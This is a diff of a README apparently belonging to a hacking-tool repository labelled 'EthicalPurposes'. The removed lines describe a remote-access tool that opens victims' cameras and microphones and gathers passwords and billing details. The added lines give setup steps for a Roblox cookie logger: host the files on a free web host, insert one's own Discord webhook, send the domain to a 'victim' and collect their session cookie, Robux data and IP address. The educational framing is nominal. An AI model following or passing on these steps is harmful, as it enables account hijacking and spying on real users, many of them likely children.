EthicalPurposes/Purposes/README.md

 # Purposes
-This file gives you acces to remote devices which are connected to the protocol in the settings of the remote event.
-It allows you to upload, delete and copy files, open camera, open mic, start speaker, gather passwords, gives you access to their billing informations and a few more creepy features.
-Don't use this with the protocol of someone else which you don't really know.
-Use it as a safety controler.
-It's normally educational purposes, so if you are gonna mess with it.
-That would be on your own risk.
+Website Logging: Roblox based

+This file gives you acces to make a XSS - domain, if you want to manage these files.
+Make a account/website on 000webhost.com to continue managing these files.
+You'll have to extract and place the files in there!

+in the dualhook source file you'll find a discord webhook.
+Change the webhook with your own created Webhook!

+Send your domain to a victim and wait till you get their informations:
+- Cookie (JavaScript based)
+- Robux Currency (JSON based)
+- Robux Average Price (JSON based)
+- Internet Protocol (SSo based)

+if you are having problems you can always DM me via Discord